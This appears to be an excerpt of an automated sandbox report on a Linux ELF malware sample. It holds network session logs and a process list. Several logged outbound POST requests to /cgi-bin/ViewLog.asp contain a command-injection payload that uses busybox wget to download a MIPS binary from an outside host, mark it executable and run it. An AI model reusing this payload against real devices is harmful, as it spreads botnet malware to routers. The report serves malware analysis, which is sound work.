                                              832192.168.2.135913831.136.118.2008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.043507099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.630153894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              833192.168.2.134928894.121.129.298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.119261026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              834192.168.2.1333932154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.155544043 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:22Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              835192.168.2.1334108154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.499006033 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:22Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              836192.168.2.1352734106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.573287010 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:31Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              837192.168.2.133547285.195.79.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.720046997 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              838192.168.2.134585031.131.88.468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.835926056 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              839192.168.2.1334110154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.839195967 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:22Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              840192.168.2.134559494.121.73.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.855319977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              System Behavior

                                              Start time (UTC):04:14:46
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:/tmp/7Ueun89KE3.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:34
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:34
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:34
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:34
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:17:29
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/7Ueun89KE3.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1